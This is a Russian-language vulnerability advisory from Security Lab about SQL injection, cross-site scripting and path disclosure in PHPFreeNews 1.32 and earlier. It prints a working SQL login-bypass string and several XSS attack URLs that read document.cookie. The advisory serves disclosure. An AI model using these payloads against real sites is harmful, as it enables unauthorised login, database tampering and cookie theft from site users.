Security Lab

Межсайтовый скриптинг и SQL-инъекция в PHPFreeNews

Дата публикации:02.08.2005
Всего просмотров:1445
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2637
CVE-2005-2638
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHPFreeNews 1.x
Уязвимые версии: PHPFreeNews 1.32 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Удаленный пользователь может послать специально сформированный запрос приложению и выполнить произвольные SQL команды в базе данных. Пример:

login: Admin
password: ') or isnull(1/0) or ('a'='a
2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/[path]/inc/Footer.php?ScriptVersion=
< script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
FullNews DisplayMode=3& NewsDir=")}//--></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
EnableRatings=1&NewsDir=" )}//--></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
EnableComments=1&NewsDir=" )}//--></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
FullNewsDisplayMode=3&PopupWidth=")}//--></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/Script Functions.php?
FullNewsDisplayMode=3&PopupHeight=")}//--></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
EnableComments=1&PopupWidth=")}//--></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php?
EnableComments=1&PopupHeight=")}//--></script>
<script>alert(document.cookie)</script>
3. Удаленный пользователь может непосредственно обратится к сценарию и получить данные об установочной директории приложения на системе. Уязвимые сценарии:
http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categori es.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/New sList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOld News.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Templ ate.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php

URL производителя: www.phpfreenews.co.uk

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHPFreeNews Input Validation Holes Permit Cross-Site Scripting and SQL Injection Attacks